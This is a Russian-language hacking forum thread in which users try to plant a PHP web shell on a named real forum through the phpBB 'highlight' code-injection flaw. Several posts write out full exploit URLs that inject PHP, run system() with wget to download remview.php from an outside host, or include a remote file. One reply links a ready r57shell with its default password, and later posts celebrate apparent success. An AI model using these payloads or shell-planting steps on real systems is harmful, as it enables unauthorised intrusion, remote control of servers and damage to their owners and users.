![]() |
Вопрос про заливку шелла через уязвимость в highligh
Есть форум http://bomg.ru/forum/
Пробывал загрузить в него remview.php этими способами: viewtopic.php?p=1&highlight=%2527.$poster=%60$ls%6 0.%2527&ls=wget%20http://........../remview.php viewtopic.php?p=3906&highlight=%2527.$poster=`wget %09http://.........../remview.php`.%2527 viewtopic.php?=http://............./remview.php%00&t=1&highlight=%2527.include($_GET[44]).%2527 и не один из них не подошол, а какие еще способы есть? |
viewtopic.php?xxx=wget%20http://supershish.narod.ru/remview.php&p=12&highlight=%2527.system($_GET[xxx]).include%2527
|
viewtopic.php?10=wget%20http://.........ru/remview.php&p=12&highlight=%2527.system($_GET[/images/avatars/]).include%2527
Не так тоже не хочет! |
Люди че такое????
http://bomg.ru/forum/remview.php :confused: Че я такое сделал? Мля, я щас повещусь! |
такой баг мной был так же замечен на других хостах. юзай тогда проще:
http://rredial.narod.ru/r57shell.php тока пароль в теле проги поменяй (сейчас он и усер и пас 1234) |
спасибо, похоже работает!
Только не как не пойму как ей пользоваться? |
а че это ваще такое?
|
|
МАЛАДЕЦ!!!
|
блин, уже страницу удалилит!!!!!!!!
|
| Время: 03:46 |